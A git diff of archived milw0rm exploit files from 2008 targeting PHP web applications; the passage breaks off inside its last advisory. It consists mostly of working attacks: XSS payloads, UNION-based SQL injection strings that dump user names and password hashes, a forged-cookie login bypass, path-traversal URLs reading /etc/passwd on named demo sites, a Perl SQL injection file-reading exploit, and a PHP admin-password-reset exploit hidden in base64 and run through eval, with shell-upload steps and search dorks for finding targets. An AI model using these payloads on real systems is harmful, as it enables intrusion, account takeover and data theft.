Multiple Cross-site Scripting Vulnerabilities + +The appendix everywhere does not check the variables transferred from outside of the user. It allows to carry out any code in a context of a user browser. +Examples of vulnerable files: +/index.php?page='><script>alert('XSS')</script> +etc + +# milw0rm.com [2008-12-18] diff --git a/platforms/php/webapps/7517.txt b/platforms/php/webapps/7517.txt index bb5255e67..a74d071f1 100755 --- a/platforms/php/webapps/7517.txt +++ b/platforms/php/webapps/7517.txt @@ -1,30 +1,30 @@ -Injader CMS -http://www.injader.com/ - - - -- (= 2.1.1 - - -- SQL - -http://localhost/upload/feeds.php?name=articles&id=<SQL> -magic_quotes_gpc = Off -register_globals = On - - -Username (urlencode): -2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511 -Pass: -2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758 - - - -- Timeline - -Author notified: Nov 30, Dec 09,10 -Injader 2.1.2: Dec 12 -Public disclosure: Dec 18 - - -- Seasons Greetings - -- http://nukeit.org - - -# milw0rm.com [2008-12-18] +Injader CMS +http://www.injader.com/ + + + +- (= 2.1.1 - + +- SQL - +http://localhost/upload/feeds.php?name=articles&id=<SQL> +magic_quotes_gpc = Off +register_globals = On + + +Username (urlencode): +2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511 +Pass: +2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758 + + + +- Timeline - +Author notified: Nov 30, Dec 09,10 +Injader 2.1.2: Dec 12 +Public disclosure: Dec 18 + + +- Seasons Greetings - +- http://nukeit.org - + +# milw0rm.com [2008-12-18] 
diff --git a/platforms/php/webapps/7518.txt b/platforms/php/webapps/7518.txt
index 433a70217..e108f35d1 100755
--- a/platforms/php/webapps/7518.txt
+++ b/platforms/php/webapps/7518.txt
@@ -1,37 +1,37 @@ ---------------------------- -Gobbl Cms 1.0 I.Cookie Hand. ---------------------------- -Autore: x0r ( Evolution Team) -Email: andry2000@hotmail.it -Demo Site:http://www.gobbl.net/ ---------------------------- - -Bug In: \admin\auth.php - -?> -include ('../config.php'); - -$user = $_POST['user']; -$pass = $_POST['pass']; - -if ( ($user == $un) and ($pass == $pw) ) -{ -setcookie( "auth", "ok", time()+40000 ); # Bugz -header ( "location:add.php" ); exit (); -} -else -{ -header ( "location:index.php" ); exit (); -} -?> - -Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili -$un\$pw ( config.php ) se così è setta il cookie auth=ok :P ^ ^ - -Exploit: - -javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P - -Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO - -# milw0rm.com [2008-12-18] +--------------------------- +Gobbl Cms 1.0 I.Cookie Hand. +--------------------------- +Autore: x0r ( Evolution Team) +Email: andry2000@hotmail.it +Demo Site:http://www.gobbl.net/ +--------------------------- + +Bug In: \admin\auth.php + +?> +include ('../config.php'); + +$user = $_POST['user']; +$pass = $_POST['pass']; + +if ( ($user == $un) and ($pass == $pw) ) +{ +setcookie( "auth", "ok", time()+40000 ); # Bugz +header ( "location:add.php" ); exit (); +} +else +{ +header ( "location:index.php" ); exit (); +} +?> + +Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili +$un\$pw ( config.php ) se così è setta il cookie auth=ok :P ^ ^ + +Exploit: + +javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P + +Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO + +# milw0rm.com [2008-12-18] diff --git a/platforms/php/webapps/7519.txt b/platforms/php/webapps/7519.txt index 3be6df51c..6dd8f4c3e 100755 --- a/platforms/php/webapps/7519.txt 
+++ b/platforms/php/webapps/7519.txt @@ -1,26 +1,26 @@ -################## Piker ####################################### -# -# -# MyPHPSite Local File Inclusion Vulnerability -# -# -# Affected software: MyPHPSite -# Vendor: www.myphpsite.org -# Risk: Medium -# -################################################################ -# -# http://[target]/[path]/index.php?mod=[LFI]%00 -# -# PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00 -# -################################################################ -# -# Found by Piker [piker0x90(at)gmail(dot)com] -# D.O.M Labs - Security Researchers -# www.domlabs.org -# -# -################################################################ - -# milw0rm.com [2008-12-18] +################## Piker ####################################### +# +# +# MyPHPSite Local File Inclusion Vulnerability +# +# +# Affected software: MyPHPSite +# Vendor: www.myphpsite.org +# Risk: Medium +# +################################################################ +# +# http://[target]/[path]/index.php?mod=[LFI]%00 +# +# PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00 +# +################################################################ +# +# Found by Piker [piker0x90(at)gmail(dot)com] +# D.O.M Labs - Security Researchers +# www.domlabs.org +# +# +################################################################ + +# milw0rm.com [2008-12-18] diff --git a/platforms/php/webapps/7522.pl b/platforms/php/webapps/7522.pl index 8ff160e03..8b84622eb 100755 --- a/platforms/php/webapps/7522.pl +++ b/platforms/php/webapps/7522.pl 
@@ -1,109 +1,109 @@ -#!/usr/bin/perl -################################ -## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com] -## D.O.M Team -## piker,ka0x,an0de,xarnuz -## 2008 Security Researchers -################################ -## -## MyPBS Remote SQL Injection Exploit -## -## This exploit tries to read an -## arbitrary file. -## -################################ - -# piker@domlabs:~/advisories$ perl mypbs.pl http://localhost/mypbs /etc/passwd -#[+] File HEX: 0x2f6574632f706173737764 -#[+] Host: http://localhost/mypbs/ -#[+] File content: -#daemon:x:1:1:daemon:/usr/sbin:/bin/sh -#bin:x:2:2:bin:/bin:/bin/sh -#sys:x:3:3:sys:/dev:/bin/sh -#sync:x:4:65534:sync:/bin:/bin/sync -#games:x:5:60:games:/usr/games:/bin/sh -# [...] -#[+] EOF -# -# - - -use LWP::UserAgent; - -open(FILE, ">&STDOUT"); - -my $host = $ARGV[0]; -my $file = $ARGV[1]; - -die &_USO unless $ARGV[1]; - -sub _USO -{ - die " - MyPBS Remote SQL Injection Exploit - - This exploit tries to read an - arbitrary file. - - usage: ./$0 <host> <file_you_want> - ex: ./$0 http://localhost/mypbs/ /etc/passwd - - "; -} - -my $ua = LWP::UserAgent->new() or die; -$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); - -my $tmp="0x"; -my $tmp2; - -foreach my $c (split(//, $file)){ - $tmp2 = sprintf ("%x", ord($c)); - $tmp .= $tmp2; -} - -print FILE "[+] File HEX: ".$tmp."\n"; - -if ($host !~ /\/$/){ $host .= "/"; } - -print FILE "[+] Host: ".$host."\n"; - -my $req = HTTP::Request->new(GET => $host."index.php?seasonID=-1 union all select CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e)"); -my $res = $ua->request($req); -my $con = $res->content; - -my $ok = 0; -open (OUT, ">result.txt"); - -if ($res->is_success){ - foreach my $linea (split(/\n/, $con)){ - if($ok == 1){ - if ($linea !~ /<FILE>/){ - print FILE $linea."\n"; - print OUT $linea."\n"; - }else{ - print FILE "\n[+] EOF\n"; - print "\n[+] File saved into 'result.txt'\n"; - goto salida; - } - } - if($linea =~ 
/<FILE>/i && $ok == 0){ - $ok = 1; - print FILE "[+] File content: \n"; - } - } - salida: - if ($ok == 0){ - print FILE "[-] Exploit Failed!"; - } -} -else{ - print FILE "[-] Exploit Failed!"; -} - -close(FILE); -close(OUT); - -#EOF - -# milw0rm.com [2008-12-19] +#!/usr/bin/perl +################################ +## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com] +## D.O.M Team +## piker,ka0x,an0de,xarnuz +## 2008 Security Researchers +################################ +## +## MyPBS Remote SQL Injection Exploit +## +## This exploit tries to read an +## arbitrary file. +## +################################ + +# piker@domlabs:~/advisories$ perl mypbs.pl http://localhost/mypbs /etc/passwd +#[+] File HEX: 0x2f6574632f706173737764 +#[+] Host: http://localhost/mypbs/ +#[+] File content: +#daemon:x:1:1:daemon:/usr/sbin:/bin/sh +#bin:x:2:2:bin:/bin:/bin/sh +#sys:x:3:3:sys:/dev:/bin/sh +#sync:x:4:65534:sync:/bin:/bin/sync +#games:x:5:60:games:/usr/games:/bin/sh +# [...] +#[+] EOF +# +# + + +use LWP::UserAgent; + +open(FILE, ">&STDOUT"); + +my $host = $ARGV[0]; +my $file = $ARGV[1]; + +die &_USO unless $ARGV[1]; + +sub _USO +{ + die " + MyPBS Remote SQL Injection Exploit + + This exploit tries to read an + arbitrary file. 
+ + usage: ./$0 <host> <file_you_want> + ex: ./$0 http://localhost/mypbs/ /etc/passwd + + "; +} + +my $ua = LWP::UserAgent->new() or die; +$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); + +my $tmp="0x"; +my $tmp2; + +foreach my $c (split(//, $file)){ + $tmp2 = sprintf ("%x", ord($c)); + $tmp .= $tmp2; +} + +print FILE "[+] File HEX: ".$tmp."\n"; + +if ($host !~ /\/$/){ $host .= "/"; } + +print FILE "[+] Host: ".$host."\n"; + +my $req = HTTP::Request->new(GET => $host."index.php?seasonID=-1 union all select CONCAT(0x3c46494c453e,load_file(".$tmp."),0x3c46494c453e)"); +my $res = $ua->request($req); +my $con = $res->content; + +my $ok = 0; +open (OUT, ">result.txt"); + +if ($res->is_success){ + foreach my $linea (split(/\n/, $con)){ + if($ok == 1){ + if ($linea !~ /<FILE>/){ + print FILE $linea."\n"; + print OUT $linea."\n"; + }else{ + print FILE "\n[+] EOF\n"; + print "\n[+] File saved into 'result.txt'\n"; + goto salida; + } + } + if($linea =~ /<FILE>/i && $ok == 0){ + $ok = 1; + print FILE "[+] File content: \n"; + } + } + salida: + if ($ok == 0){ + print FILE "[-] Exploit Failed!"; + } +} +else{ + print FILE "[-] Exploit Failed!"; +} + +close(FILE); +close(OUT); + +#EOF + +# milw0rm.com [2008-12-19] diff --git a/platforms/php/webapps/7523.php b/platforms/php/webapps/7523.php index 51ed06004..51cf68d1e 100755 --- a/platforms/php/webapps/7523.php +++ b/platforms/php/webapps/7523.php 
@@ -1,158 +1,158 @@ -<?php -/* -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - -============================================================================== - ReVou Twitter Clone Admin Password Changing Exploit -============================================================================== - [»] Script: [ ReVou Twitter Clone ] - [»] Language: [ PHP, MySQL ] - [»] homepage: [ http://www.revou.com/ ] - [»] Type: [ Commercial ] - [»] found-report: [ 14.12.2008-19.12.2008 ] - [»] Founder.coder: [ G4N0K <mail.ganok[at]gmail.com> ] -===[ NOTES ]=== - [.] Reset pwd, login as ADMIN, use this path to upload your php-shell-script: http://site.tld/revou/adminlogin/index.php?id=dbimport - [.] your file is here: http://site.tld/revou/db_backup/shell.php -===[ GGL-DORKS ]=== - "Joined ReVou" - "Tell the world what you're doing at this moment!" - "days ago from web" "RSS feed" "API" - ... -===[ LIVE ]=== - [»] http://www.revou.com/demo/ -===[ Greetz ]=== - [»] ALLAH - [»] rgod <- WTF, you dont know him...! - [»] Tornado2800, B13, AFSHIN-ZARBAT, QU1E, Hussain-X, "SauDi L0rD", Sakab ... - [»] Oops I forgot someone -> Str0ke, Keep-it-up Brotha :-) - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,fo-gimme... -*/ - -error_reporting(E_ALL); -echo <<<HTML -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -<html xmlns="http://www.w3.org/1999/xhtml"> -<head> -<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> -<title>ReVou Twitter Clone Admin Password Changing Exploit | G4N0K - - - -
    -
    -==============================================================================
    -                      _      _       _          _      _   _                  
    -                     / \    | |     | |        / \    | | | |                 
    -                    / _ \   | |     | |       / _ \   | |_| |                 
    -                   / ___ \  | |___  | |___   / ___ \  |  _  |                 
    -   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|                 
    -                                                                              
    -                                                                              
    -==============================================================================
    -                      ____   _  _     _   _    ___    _  __                   
    -                     / ___| | || |   | \ | |  / _ \  | |/ /                   
    -                    | |  _  | || |_  |  \| | | | | | | ' /                    
    -                    | |_| | |__   _| | |\  | | |_| | | . \                    
    -         Exploit By  \____|    |_|   |_| \_|  \___/  |_|\_\                   
    -                                                                              
    -==============================================================================
    -ReVou Twitter Clone Admin Password Changing Exploit
    -==============================================================================
    -
    -HTML; -$FORM= << -
    -Path ex: /script/ -
    -  E x p l o i t 
    -
    • -
    • -
    • -
    • -
    • -
    • -
    • -


  • -

    - -
    - -

    - -FFF; - -$GNK = "aWYgKGlzc2V0KCRfUE9TVFsnZ29fR05LJ10pICYmIGlzc2V0KCRfUE9TVFsidXJpX0dOSyJdKSAm". - "JiAhZW1wdHkoJF9QT1NUWyJ1cmlfR05LIl0pICYmIGlzc2V0KCRfUE9TVFsicGF0aF9HTksiXSkg". - "JiYgIWVtcHR5KCRfUE9TVFsicGF0aF9HTksiXSkgJiYgaXNzZXQoJF9QT1NUWyJud3B3ZF9HTksi". - "XSkgJiYgIWVtcHR5KCRfUE9TVFsibndwd2RfR05LIl0pKSB7JHBzdCA9ICJuZXdwYXNzMT0iLiRf". - "UE9TVFsnbndwd2RfR05LJ10uIiZuZXdwYXNzMj0iLiRfUE9TVFsnbndwd2RfR05LJ10uIiZvaz1D". - "aGFuZ2UiOyRjaGVuY2hvayA9IHN0cmxlbigkcHN0KTskam9rZSA9ICJQT1NUICIuJF9QT1NUWyJw". - "YXRoX0dOSyJdLiIvYWRtaW5sb2dpbi9wYXNzd29yZC5waHAgSFRUUC8xLjFcclxuSG9zdDogIi4k". - "X1BPU1RbInVyaV9HTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzOyBV". - "OyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1MjkwNiBGaXJlZm94". - "LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2ZVxyXG5Db250". - "ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5Db250ZW50LUxl". - "bmd0aDogIi4kY2hlbmNob2suIlxyXG5cclxuIjskam9rZSAuPSAkcHN0LiJcclxuIjskcmVzID0g". - "IiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbInVyaV9HTksiXSwkX1BPU1RbInBvcnRfR05L". - "Il0sJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAvPjxiPndoYXQg". - "YXJlIHlhIGRvaW5nLi4uISA8YnIgLz5TdW10aGluZyB3ZW50IHdyb25nLi4uISA8L2I+PGJyIC8+". - "PGJyIC8+PC9kaXY+Iik7fWVjaG8oIjxkaXYgc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h". - "O3BhZGRpbmctbGVmdDo1MHB4O1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5bK10gPGI+". - "U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2UpO3doaWxl". - "KCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRhY2spO2lm". - "IChzdHJpc3RyKCRyZXMsICJzdWNjZXNzZnVsbHkiKSl7ZWNobyAiWytdPGI+IEV4cGxvaXRlZCAh". - "IDwvYj48YnIgLz5bK10gPGI+PGZvbnQgY29sb3I9XCJyZWRcIj5wYXNzd29yZCBjaGFuZ2VkLi4u". - "PC9iPjwvZm9udD48YnIgLz5bK10gPGI+TmV3IHBhc3N3b3JkIGlzIDogIi4kX1BPU1RbIm53cHdk". - "X0dOSyJdLiI8L2I+IDxiciAvPlsrXTxiPiBhZG1pbiBwYW5lbDo8L2I+IDxhIGhyZWY9XCJodHRw". - "Oi8vIi4kX1BPU1RbInVyaV9HTksiXS4kX1BPU1RbInBhdGhfR05LIl0uImFkbWlubG9naW4vXCI+". 
- "IGh0dHA6Ly8iLiRfUE9TVFsidXJpX0dOSyJdLiRfUE9TVFsicGF0aF9HTksiXS4iYWRtaW5sb2dp". - "bi88L2E+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5". - "bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4w". - "Sy4uLjwvc3Bhbj48YnIgLz48YnIgLz48L2Rpdj4iO30gZWxzZSB7IGVjaG8gIlsrXTxiPiBPb3Bz". - "ICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4gLiAuIC4gITwvYj48YnIgLz48YnIgLz48". - "L2Rpdj4iO31mbHVzaCgpOyB9IGVsc2UgeyBlY2hvICRGT1JNO30=";eval(base64_decode($GNK)); -?> - -# milw0rm.com [2008-12-19] + ] +===[ NOTES ]=== + [.] Reset pwd, login as ADMIN, use this path to upload your php-shell-script: http://site.tld/revou/adminlogin/index.php?id=dbimport + [.] your file is here: http://site.tld/revou/db_backup/shell.php +===[ GGL-DORKS ]=== + "Joined ReVou" + "Tell the world what you're doing at this moment!" + "days ago from web" "RSS feed" "API" + ... +===[ LIVE ]=== + [»] http://www.revou.com/demo/ +===[ Greetz ]=== + [»] ALLAH + [»] rgod <- WTF, you dont know him...! + [»] Tornado2800, B13, AFSHIN-ZARBAT, QU1E, Hussain-X, "SauDi L0rD", Sakab ... + [»] Oops I forgot someone -> Str0ke, Keep-it-up Brotha :-) + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,fo-gimme... +*/ + +error_reporting(E_ALL); +echo << + + + +ReVou Twitter Clone Admin Password Changing Exploit | G4N0K + + + +
    +
    +==============================================================================
    +                      _      _       _          _      _   _                  
    +                     / \    | |     | |        / \    | | | |                 
    +                    / _ \   | |     | |       / _ \   | |_| |                 
    +                   / ___ \  | |___  | |___   / ___ \  |  _  |                 
    +   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|                 
    +                                                                              
    +                                                                              
    +==============================================================================
    +                      ____   _  _     _   _    ___    _  __                   
    +                     / ___| | || |   | \ | |  / _ \  | |/ /                   
    +                    | |  _  | || |_  |  \| | | | | | | ' /                    
    +                    | |_| | |__   _| | |\  | | |_| | | . \                    
    +         Exploit By  \____|    |_|   |_| \_|  \___/  |_|\_\                   
    +                                                                              
    +==============================================================================
    +ReVou Twitter Clone Admin Password Changing Exploit
    +==============================================================================
    +
    +HTML; +$FORM= << +
    +Path ex: /script/ +
    +  E x p l o i t 
    +
    • +
    • +
    • +
    • +
    • +
    • +
    • +

    +


    + +
    +
    +

    + +FFF; + +$GNK = "aWYgKGlzc2V0KCRfUE9TVFsnZ29fR05LJ10pICYmIGlzc2V0KCRfUE9TVFsidXJpX0dOSyJdKSAm". + "JiAhZW1wdHkoJF9QT1NUWyJ1cmlfR05LIl0pICYmIGlzc2V0KCRfUE9TVFsicGF0aF9HTksiXSkg". + "JiYgIWVtcHR5KCRfUE9TVFsicGF0aF9HTksiXSkgJiYgaXNzZXQoJF9QT1NUWyJud3B3ZF9HTksi". + "XSkgJiYgIWVtcHR5KCRfUE9TVFsibndwd2RfR05LIl0pKSB7JHBzdCA9ICJuZXdwYXNzMT0iLiRf". + "UE9TVFsnbndwd2RfR05LJ10uIiZuZXdwYXNzMj0iLiRfUE9TVFsnbndwd2RfR05LJ10uIiZvaz1D". + "aGFuZ2UiOyRjaGVuY2hvayA9IHN0cmxlbigkcHN0KTskam9rZSA9ICJQT1NUICIuJF9QT1NUWyJw". + "YXRoX0dOSyJdLiIvYWRtaW5sb2dpbi9wYXNzd29yZC5waHAgSFRUUC8xLjFcclxuSG9zdDogIi4k". + "X1BPU1RbInVyaV9HTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzOyBV". + "OyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1MjkwNiBGaXJlZm94". + "LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2ZVxyXG5Db250". + "ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5Db250ZW50LUxl". + "bmd0aDogIi4kY2hlbmNob2suIlxyXG5cclxuIjskam9rZSAuPSAkcHN0LiJcclxuIjskcmVzID0g". + "IiI7JGF0dGFjayA9IGZzb2Nrb3BlbigkX1BPU1RbInVyaV9HTksiXSwkX1BPU1RbInBvcnRfR05L". + "Il0sJGVycm5vLCAkZXJyc3RyLCA1MCk7aWYoISRhdHRhY2spe2VjaG8oIjxiciAvPjxiPndoYXQg". + "YXJlIHlhIGRvaW5nLi4uISA8YnIgLz5TdW10aGluZyB3ZW50IHdyb25nLi4uISA8L2I+PGJyIC8+". + "PGJyIC8+PC9kaXY+Iik7fWVjaG8oIjxkaXYgc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21h". + "O3BhZGRpbmctbGVmdDo1MHB4O1wiPlsrXSA8Yj5Db25uZWN0ZWQuLi48YnIvPjwvYj5bK10gPGI+". + "U2VuZGluZyByZXF1ZXN0Li4uPGJyLz48L2I+Iik7ZndyaXRlKCRhdHRhY2ssJGpva2UpO3doaWxl". + "KCFmZW9mKCRhdHRhY2spKXskcmVzLj1mZ2V0cygkYXR0YWNrKTt9ZmNsb3NlKCRhdHRhY2spO2lm". + "IChzdHJpc3RyKCRyZXMsICJzdWNjZXNzZnVsbHkiKSl7ZWNobyAiWytdPGI+IEV4cGxvaXRlZCAh". + "IDwvYj48YnIgLz5bK10gPGI+PGZvbnQgY29sb3I9XCJyZWRcIj5wYXNzd29yZCBjaGFuZ2VkLi4u". + "PC9iPjwvZm9udD48YnIgLz5bK10gPGI+TmV3IHBhc3N3b3JkIGlzIDogIi4kX1BPU1RbIm53cHdk". + "X0dOSyJdLiI8L2I+IDxiciAvPlsrXTxiPiBhZG1pbiBwYW5lbDo8L2I+IDxhIGhyZWY9XCJodHRw". + "Oi8vIi4kX1BPU1RbInVyaV9HTksiXS4kX1BPU1RbInBhdGhfR05LIl0uImFkbWlubG9naW4vXCI+". 
+ "IGh0dHA6Ly8iLiRfUE9TVFsidXJpX0dOSyJdLiRfUE9TVFsicGF0aF9HTksiXS4iYWRtaW5sb2dp". + "bi88L2E+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PHNwYW4gc3R5". + "bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhwbG9pdCBCeSBHNE4w". + "Sy4uLjwvc3Bhbj48YnIgLz48YnIgLz48L2Rpdj4iO30gZWxzZSB7IGVjaG8gIlsrXTxiPiBPb3Bz". + "ICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4gLiAuIC4gITwvYj48YnIgLz48YnIgLz48". + "L2Rpdj4iO31mbHVzaCgpOyB9IGVsc2UgeyBlY2hvICRGT1JNO30=";eval(base64_decode($GNK)); +?> + +# milw0rm.com [2008-12-19] diff --git a/platforms/php/webapps/7524.txt b/platforms/php/webapps/7524.txt index 8ffc7f7aa..3a6877e81 100755 --- a/platforms/php/webapps/7524.txt +++ b/platforms/php/webapps/7524.txt @@ -1,22 +1,22 @@ -Online Keyword Research (download.php filename) Local File Include - -# author : Cold z3ro, http://www.hackteach.org/ -# script : http://secure.emetrix.com/order/product.asp?PID=68900247 -# demo : http://www.rightscripts.com/keywordresearch/ - - -# Exploit - -[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd - - -# Example - -[~] http://www.rightscripts.com/keywordresearch/download.php?filename=../../../../../../../../etc/passwd - - - -============================ -Greetz : www.hackteach.org members , AnGeL25dZ - -# milw0rm.com [2008-12-19] +Online Keyword Research (download.php filename) Local File Include + +# author : Cold z3ro, http://www.hackteach.org/ +# script : http://secure.emetrix.com/order/product.asp?PID=68900247 +# demo : http://www.rightscripts.com/keywordresearch/ + + +# Exploit + +[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd + + +# Example + +[~] http://www.rightscripts.com/keywordresearch/download.php?filename=../../../../../../../../etc/passwd + + + +============================ +Greetz : www.hackteach.org members , AnGeL25dZ + +# milw0rm.com [2008-12-19] 
diff --git a/platforms/php/webapps/7525.txt b/platforms/php/webapps/7525.txt index 3889dcc69..7aa1b8857 100755 --- a/platforms/php/webapps/7525.txt +++ b/platforms/php/webapps/7525.txt @@ -1,26 +1,26 @@ -Extract Website (download.php filename) Local File Include - -# author : Cold z3ro, http://www.hackteach.org/ -# script : http://secure.emetrix.com/order/product.asp?PID=74332316 -# demo : http://www.rightscripts.com/extractwebsite/ -# about : This tool help you extract web data include URL links, - domain names, contact emails, keywords, meta tags, page titles - or text from other website. - You can extract these data from a list of website links or from simple text. - - -# Exploit - -[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd - - - -# Example - -[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd - - -================================== -Greetz : www.hackteach.org members , AnGeL25dZ - -# milw0rm.com [2008-12-19] +Extract Website (download.php filename) Local File Include + +# author : Cold z3ro, http://www.hackteach.org/ +# script : http://secure.emetrix.com/order/product.asp?PID=74332316 +# demo : http://www.rightscripts.com/extractwebsite/ +# about : This tool help you extract web data include URL links, + domain names, contact emails, keywords, meta tags, page titles + or text from other website. + You can extract these data from a list of website links or from simple text. + + +# Exploit + +[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd + + + +# Example + +[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd + + +================================== +Greetz : www.hackteach.org members , AnGeL25dZ + +# milw0rm.com [2008-12-19] diff --git a/platforms/php/webapps/7526.txt b/platforms/php/webapps/7526.txt index c36bc16c1..ebd92d4a5 100755 --- a/platforms/php/webapps/7526.txt 
+++ b/platforms/php/webapps/7526.txt 
@@ -1,76 +1,76 @@ -[START] - -#################################################################################################################### -[0x01] Informations: - -Script : myPHPscripts Login Session 2.0 -Download : http://www.hotscripts.com/jump.php?listing_id=69881&jump_type=1 -Vulnerability : XSS / Database Disclosure -Author : Osirys -Contact : osirys[at]live[dot]it -Website : http://osirys.org -Notes : Proud to be Italian -Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX - - -#################################################################################################################### -[0x02] Bug: [XSS] -###### - -Bugged file is: /[path]/login.php - -[CODE] - -if ($u_invalid == 1) { $errors[] = "User $user is invalid. 3-15 alphanumeric characters required."; } - -[/CODE] - -If the username that we typed in the register form is invalid, it will directly appear in the html code. -So we just have to put a js code, like an alert, and we will get a XSS. - -[!] FIX: Filter or validate $user before printing it in html code. - - -[!] EXPLOIT: - 1) Go at: /[path]/login.php?ls_register - 2) In User form put a js code. (ex: ) - 3) Field the other forms, and press register button. - -#################################################################################################################### -[0x03] Bug: [Database Disclosure] -###### - -Bugged file is: /[path]/login.php - -[CODE] - - if (empty($errors)) { - $newline = $records++; - $e_email = base64_encode($email); - $data = "$newline||$user||$e_email||$pass\n"; - $fh = fopen($users, 'a') or die("Can't open user database."); - fwrite($fh, $data); - fclose($fh); -?> - -[/CODE] - -This cms uses a flat database, a .txt file where it stores usernames,passwords and emails of the registered -users. - -[!] FIX: Don't use this kind of authentication :) - - -[!] 
EXPLOIT: /[path]/users.txt - - Informations are printed in this way: - 0||admin||b3NpcnlzQGxpdmUuaXQ=||6e1459df459890dfd8b4c3687c18abba - 1||cazzone||bG9sQGxvbC5pdA==||b7dba5a1bc3605a87b59ac8147512c97 - - user_number||username||email(base64 encrypted)||password(md5 encrypted) - -#################################################################################################################### - -[/END] - -# milw0rm.com [2008-12-19] +[START] + +#################################################################################################################### +[0x01] Informations: + +Script : myPHPscripts Login Session 2.0 +Download : http://www.hotscripts.com/jump.php?listing_id=69881&jump_type=1 +Vulnerability : XSS / Database Disclosure +Author : Osirys +Contact : osirys[at]live[dot]it +Website : http://osirys.org +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX + + +#################################################################################################################### +[0x02] Bug: [XSS] +###### + +Bugged file is: /[path]/login.php + +[CODE] + +if ($u_invalid == 1) { $errors[] = "User $user is invalid. 3-15 alphanumeric characters required."; } + +[/CODE] + +If the username that we typed in the register form is invalid, it will directly appear in the html code. +So we just have to put a js code, like an alert, and we will get a XSS. + +[!] FIX: Filter or validate $user before printing it in html code. + + +[!] EXPLOIT: + 1) 